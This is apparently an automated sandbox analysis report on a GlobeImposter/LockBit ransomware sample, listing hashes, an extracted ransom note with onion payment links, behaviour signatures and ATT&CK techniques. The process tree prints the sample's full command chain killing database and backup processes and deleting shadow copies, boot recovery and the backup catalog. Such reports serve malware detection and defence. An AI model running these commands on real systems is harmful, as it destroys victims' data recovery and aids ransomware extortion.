globeimposter | ddf3a748583ee2b32dae1d4fad9ee5e6888c171f0f93f06f8752fa5e1ed79043

Analysis

max time kernel
149s
max time network
160s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
01-07-2022 04:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ddf3a748583ee2b32dae1d4fad9ee5e6888c171f0f93f06f8752fa5e1ed79043.exe
Size

334KB
MD5

8e45b07b7dbf71049ec7590994ce5632
SHA1

8284940b7896c314d196ef7f1453687cd1b35a37
SHA256

ddf3a748583ee2b32dae1d4fad9ee5e6888c171f0f93f06f8752fa5e1ed79043
SHA512

4e1f9ef55a387138cd09f7ef8dad4776f11a35448b9664bb3c78a6c2c4c69c0024247cdd03668afcaa3c3c67f1407fe37dcf7927534e35d2e7d67bb37322f5eb

Score

10^/10

globeimposter lockbit evasion persistence ransomware spyware stealer

Malware Config

Extracted

Path

C:\Restore-My-Files.txt

Family

globeimposter

Ransom Note

All your files are Encrypted! For data recovery needs decryptor. How to buy decryptor: ---------------------------------------------------------------------------------------- | 1. Download Tor browser - https://www.torproject.org/ and install it. | 2. Open link in TOR browser - http://alcx6zctcmhmn3kx.onion/ | 3. Follow the instructions on this page ---------------------------------------------------------------------------------------- Note! This link is available via "Tor Browser" only. ------------------------------------------------------------ Free decryption as guarantee. Before paying you can send us 1 file for free decryption. ------------------------------------------------------------ alternate address - http://helpinfh6vj47ift.onion/ DO NOT CHANGE DATA BELO ###s6dlsnhtjwbhr###ED56F6A208E3EB2###

URLs

http://alcx6zctcmhmn3kx.onion/

http://helpinfh6vj47ift.onion/

Signatures

GlobeImposter
GlobeImposter is a ransomware first seen in 2017.
ransomware globeimposter
Lockbit
Ransomware family with multiple variants released since late 2019.
ransomware lockbit
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

Processes:

bcdedit.exebcdedit.exe

pid	Process
2064	bcdedit.exe
3272	bcdedit.exe

Deletes backup catalog 3 TTPs 1 IoCs

Uses wbadmin.exe to inhibit system recovery.

ransomware

Command-Line Interface

T1059

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

wbadmin.exe

pid	Process
1760	wbadmin.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

ddf3a748583ee2b32dae1d4fad9ee5e6888c171f0f93f06f8752fa5e1ed79043.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	ddf3a748583ee2b32dae1d4fad9ee5e6888c171f0f93f06f8752fa5e1ed79043.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

ddf3a748583ee2b32dae1d4fad9ee5e6888c171f0f93f06f8752fa5e1ed79043.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	ddf3a748583ee2b32dae1d4fad9ee5e6888c171f0f93f06f8752fa5e1ed79043.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XO1XADpO01 = "\"C\""	ddf3a748583ee2b32dae1d4fad9ee5e6888c171f0f93f06f8752fa5e1ed79043.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

ddf3a748583ee2b32dae1d4fad9ee5e6888c171f0f93f06f8752fa5e1ed79043.exe

description	pid	Process	procid_target
PID 2300 set thread context of 4480	2300	ddf3a748583ee2b32dae1d4fad9ee5e6888c171f0f93f06f8752fa5e1ed79043.exe	86

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 4 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

vds.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	vds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName	vds.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exe

pid	Process
4680	vssadmin.exe

Kills process with taskkill 5 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	Process
4504	taskkill.exe
4972	taskkill.exe
4552	taskkill.exe
2252	taskkill.exe
1944	taskkill.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

ddf3a748583ee2b32dae1d4fad9ee5e6888c171f0f93f06f8752fa5e1ed79043.exe

pid	Process
2300	ddf3a748583ee2b32dae1d4fad9ee5e6888c171f0f93f06f8752fa5e1ed79043.exe
2300	ddf3a748583ee2b32dae1d4fad9ee5e6888c171f0f93f06f8752fa5e1ed79043.exe
2300	ddf3a748583ee2b32dae1d4fad9ee5e6888c171f0f93f06f8752fa5e1ed79043.exe
2300	ddf3a748583ee2b32dae1d4fad9ee5e6888c171f0f93f06f8752fa5e1ed79043.exe
2300	ddf3a748583ee2b32dae1d4fad9ee5e6888c171f0f93f06f8752fa5e1ed79043.exe
2300	ddf3a748583ee2b32dae1d4fad9ee5e6888c171f0f93f06f8752fa5e1ed79043.exe
2300	ddf3a748583ee2b32dae1d4fad9ee5e6888c171f0f93f06f8752fa5e1ed79043.exe
2300	ddf3a748583ee2b32dae1d4fad9ee5e6888c171f0f93f06f8752fa5e1ed79043.exe

Suspicious behavior: MapViewOfSection 4 IoCs

Processes:

ddf3a748583ee2b32dae1d4fad9ee5e6888c171f0f93f06f8752fa5e1ed79043.exe

pid	Process
2300	ddf3a748583ee2b32dae1d4fad9ee5e6888c171f0f93f06f8752fa5e1ed79043.exe
2300	ddf3a748583ee2b32dae1d4fad9ee5e6888c171f0f93f06f8752fa5e1ed79043.exe
2300	ddf3a748583ee2b32dae1d4fad9ee5e6888c171f0f93f06f8752fa5e1ed79043.exe
2300	ddf3a748583ee2b32dae1d4fad9ee5e6888c171f0f93f06f8752fa5e1ed79043.exe

Suspicious use of AdjustPrivilegeToken 53 IoCs

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exevssvc.exeWMIC.exewbengine.exe

description	pid	Process
Token: SeDebugPrivilege	4504	taskkill.exe
Token: SeDebugPrivilege	4972	taskkill.exe
Token: SeDebugPrivilege	4552	taskkill.exe
Token: SeDebugPrivilege	2252	taskkill.exe
Token: SeDebugPrivilege	1944	taskkill.exe
Token: SeBackupPrivilege	3788	vssvc.exe
Token: SeRestorePrivilege	3788	vssvc.exe
Token: SeAuditPrivilege	3788	vssvc.exe
Token: SeIncreaseQuotaPrivilege	4236	WMIC.exe
Token: SeSecurityPrivilege	4236	WMIC.exe
Token: SeTakeOwnershipPrivilege	4236	WMIC.exe
Token: SeLoadDriverPrivilege	4236	WMIC.exe
Token: SeSystemProfilePrivilege	4236	WMIC.exe
Token: SeSystemtimePrivilege	4236	WMIC.exe
Token: SeProfSingleProcessPrivilege	4236	WMIC.exe
Token: SeIncBasePriorityPrivilege	4236	WMIC.exe
Token: SeCreatePagefilePrivilege	4236	WMIC.exe
Token: SeBackupPrivilege	4236	WMIC.exe
Token: SeRestorePrivilege	4236	WMIC.exe
Token: SeShutdownPrivilege	4236	WMIC.exe
Token: SeDebugPrivilege	4236	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4236	WMIC.exe
Token: SeRemoteShutdownPrivilege	4236	WMIC.exe
Token: SeUndockPrivilege	4236	WMIC.exe
Token: SeManageVolumePrivilege	4236	WMIC.exe
Token: 33	4236	WMIC.exe
Token: 34	4236	WMIC.exe
Token: 35	4236	WMIC.exe
Token: 36	4236	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4236	WMIC.exe
Token: SeSecurityPrivilege	4236	WMIC.exe
Token: SeTakeOwnershipPrivilege	4236	WMIC.exe
Token: SeLoadDriverPrivilege	4236	WMIC.exe
Token: SeSystemProfilePrivilege	4236	WMIC.exe
Token: SeSystemtimePrivilege	4236	WMIC.exe
Token: SeProfSingleProcessPrivilege	4236	WMIC.exe
Token: SeIncBasePriorityPrivilege	4236	WMIC.exe
Token: SeCreatePagefilePrivilege	4236	WMIC.exe
Token: SeBackupPrivilege	4236	WMIC.exe
Token: SeRestorePrivilege	4236	WMIC.exe
Token: SeShutdownPrivilege	4236	WMIC.exe
Token: SeDebugPrivilege	4236	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4236	WMIC.exe
Token: SeRemoteShutdownPrivilege	4236	WMIC.exe
Token: SeUndockPrivilege	4236	WMIC.exe
Token: SeManageVolumePrivilege	4236	WMIC.exe
Token: 33	4236	WMIC.exe
Token: 34	4236	WMIC.exe
Token: 35	4236	WMIC.exe
Token: 36	4236	WMIC.exe
Token: SeBackupPrivilege	3104	wbengine.exe
Token: SeRestorePrivilege	3104	wbengine.exe
Token: SeSecurityPrivilege	3104	wbengine.exe

Suspicious use of WriteProcessMemory 35 IoCs

Processes:

ddf3a748583ee2b32dae1d4fad9ee5e6888c171f0f93f06f8752fa5e1ed79043.exeddf3a748583ee2b32dae1d4fad9ee5e6888c171f0f93f06f8752fa5e1ed79043.execmd.exe

description	pid	Process	procid_target
PID 2300 wrote to memory of 328	2300	ddf3a748583ee2b32dae1d4fad9ee5e6888c171f0f93f06f8752fa5e1ed79043.exe	83
PID 2300 wrote to memory of 328	2300	ddf3a748583ee2b32dae1d4fad9ee5e6888c171f0f93f06f8752fa5e1ed79043.exe	83
PID 2300 wrote to memory of 328	2300	ddf3a748583ee2b32dae1d4fad9ee5e6888c171f0f93f06f8752fa5e1ed79043.exe	83
PID 2300 wrote to memory of 3132	2300	ddf3a748583ee2b32dae1d4fad9ee5e6888c171f0f93f06f8752fa5e1ed79043.exe	84
PID 2300 wrote to memory of 3132	2300	ddf3a748583ee2b32dae1d4fad9ee5e6888c171f0f93f06f8752fa5e1ed79043.exe	84
PID 2300 wrote to memory of 3132	2300	ddf3a748583ee2b32dae1d4fad9ee5e6888c171f0f93f06f8752fa5e1ed79043.exe	84
PID 2300 wrote to memory of 3028	2300	ddf3a748583ee2b32dae1d4fad9ee5e6888c171f0f93f06f8752fa5e1ed79043.exe	85
PID 2300 wrote to memory of 3028	2300	ddf3a748583ee2b32dae1d4fad9ee5e6888c171f0f93f06f8752fa5e1ed79043.exe	85
PID 2300 wrote to memory of 3028	2300	ddf3a748583ee2b32dae1d4fad9ee5e6888c171f0f93f06f8752fa5e1ed79043.exe	85
PID 2300 wrote to memory of 4480	2300	ddf3a748583ee2b32dae1d4fad9ee5e6888c171f0f93f06f8752fa5e1ed79043.exe	86
PID 2300 wrote to memory of 4480	2300	ddf3a748583ee2b32dae1d4fad9ee5e6888c171f0f93f06f8752fa5e1ed79043.exe	86
PID 2300 wrote to memory of 4480	2300	ddf3a748583ee2b32dae1d4fad9ee5e6888c171f0f93f06f8752fa5e1ed79043.exe	86
PID 2300 wrote to memory of 4480	2300	ddf3a748583ee2b32dae1d4fad9ee5e6888c171f0f93f06f8752fa5e1ed79043.exe	86
PID 4480 wrote to memory of 4372	4480	ddf3a748583ee2b32dae1d4fad9ee5e6888c171f0f93f06f8752fa5e1ed79043.exe	87
PID 4480 wrote to memory of 4372	4480	ddf3a748583ee2b32dae1d4fad9ee5e6888c171f0f93f06f8752fa5e1ed79043.exe	87
PID 4372 wrote to memory of 4504	4372	cmd.exe	89
PID 4372 wrote to memory of 4504	4372	cmd.exe	89
PID 4372 wrote to memory of 4972	4372	cmd.exe	90
PID 4372 wrote to memory of 4972	4372	cmd.exe	90
PID 4372 wrote to memory of 4552	4372	cmd.exe	91
PID 4372 wrote to memory of 4552	4372	cmd.exe	91
PID 4372 wrote to memory of 2252	4372	cmd.exe	92
PID 4372 wrote to memory of 2252	4372	cmd.exe	92
PID 4372 wrote to memory of 1944	4372	cmd.exe	93
PID 4372 wrote to memory of 1944	4372	cmd.exe	93
PID 4372 wrote to memory of 4680	4372	cmd.exe	94
PID 4372 wrote to memory of 4680	4372	cmd.exe	94
PID 4372 wrote to memory of 4236	4372	cmd.exe	97
PID 4372 wrote to memory of 4236	4372	cmd.exe	97
PID 4372 wrote to memory of 2064	4372	cmd.exe	98
PID 4372 wrote to memory of 2064	4372	cmd.exe	98
PID 4372 wrote to memory of 3272	4372	cmd.exe	99
PID 4372 wrote to memory of 3272	4372	cmd.exe	99
PID 4372 wrote to memory of 1760	4372	cmd.exe	100
PID 4372 wrote to memory of 1760	4372	cmd.exe	100

C:\Users\Admin\AppData\Local\Temp\ddf3a748583ee2b32dae1d4fad9ee5e6888c171f0f93f06f8752fa5e1ed79043.exe
"C:\Users\Admin\AppData\Local\Temp\ddf3a748583ee2b32dae1d4fad9ee5e6888c171f0f93f06f8752fa5e1ed79043.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2300
- C:\Users\Admin\AppData\Local\Temp\ddf3a748583ee2b32dae1d4fad9ee5e6888c171f0f93f06f8752fa5e1ed79043.exe
  "C:\Users\Admin\AppData\Local\Temp\ddf3a748583ee2b32dae1d4fad9ee5e6888c171f0f93f06f8752fa5e1ed79043.exe"
  2⤵
  PID:328
- C:\Users\Admin\AppData\Local\Temp\ddf3a748583ee2b32dae1d4fad9ee5e6888c171f0f93f06f8752fa5e1ed79043.exe
  "C:\Users\Admin\AppData\Local\Temp\ddf3a748583ee2b32dae1d4fad9ee5e6888c171f0f93f06f8752fa5e1ed79043.exe"
  2⤵
  PID:3132
- C:\Users\Admin\AppData\Local\Temp\ddf3a748583ee2b32dae1d4fad9ee5e6888c171f0f93f06f8752fa5e1ed79043.exe
  "C:\Users\Admin\AppData\Local\Temp\ddf3a748583ee2b32dae1d4fad9ee5e6888c171f0f93f06f8752fa5e1ed79043.exe"
  2⤵
  PID:3028
- C:\Users\Admin\AppData\Local\Temp\ddf3a748583ee2b32dae1d4fad9ee5e6888c171f0f93f06f8752fa5e1ed79043.exe
  "C:\Users\Admin\AppData\Local\Temp\ddf3a748583ee2b32dae1d4fad9ee5e6888c171f0f93f06f8752fa5e1ed79043.exe"
  2⤵
  - Checks computer location settings
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:4480
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /f /im sql* & taskkill /f /im backup* & taskkill /f /im MSExchange* & taskkill /f /im Microsoft.Exchange.* & taskkill /f /im mysql* & vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4372
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im sql*
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4504
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im backup*
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4972
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im MSExchange*
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4552
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Microsoft.Exchange.*
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2252
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im mysql*
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1944
  - - C:\Windows\system32\vssadmin.exe
      vssadmin delete shadows /all /quiet
      4⤵
      Interacts with shadow copies
      PID:4680
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic shadowcopy delete
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4236
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {default} bootstatuspolicy ignoreallfailures
      4⤵
      Modifies boot configuration data using bcdedit
      PID:2064
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {default} recoveryenabled no
      4⤵
      Modifies boot configuration data using bcdedit
      PID:3272
  - - C:\Windows\system32\wbadmin.exe
      wbadmin delete catalog -quiet
      4⤵
      Deletes backup catalog
      PID:1760

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3788

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3104

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:2684

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
- Checks SCSI registry key(s)
PID:2604

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

File Deletion

T1107

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/328-130-0x0000000000000000-mapping.dmp

Download
memory/1760-145-0x0000000000000000-mapping.dmp

Download
memory/1944-140-0x0000000000000000-mapping.dmp

Download
memory/2064-143-0x0000000000000000-mapping.dmp

Download
memory/2252-139-0x0000000000000000-mapping.dmp

Download
memory/3028-132-0x0000000000000000-mapping.dmp

Download
memory/3132-131-0x0000000000000000-mapping.dmp

Download
memory/3272-144-0x0000000000000000-mapping.dmp

Download
memory/4236-142-0x0000000000000000-mapping.dmp

Download
memory/4372-134-0x0000000000000000-mapping.dmp

Download
memory/4480-135-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/4480-133-0x0000000000000000-mapping.dmp

Download
memory/4504-136-0x0000000000000000-mapping.dmp

Download
memory/4552-138-0x0000000000000000-mapping.dmp

Download
memory/4680-141-0x0000000000000000-mapping.dmp

Download
memory/4972-137-0x0000000000000000-mapping.dmp

Download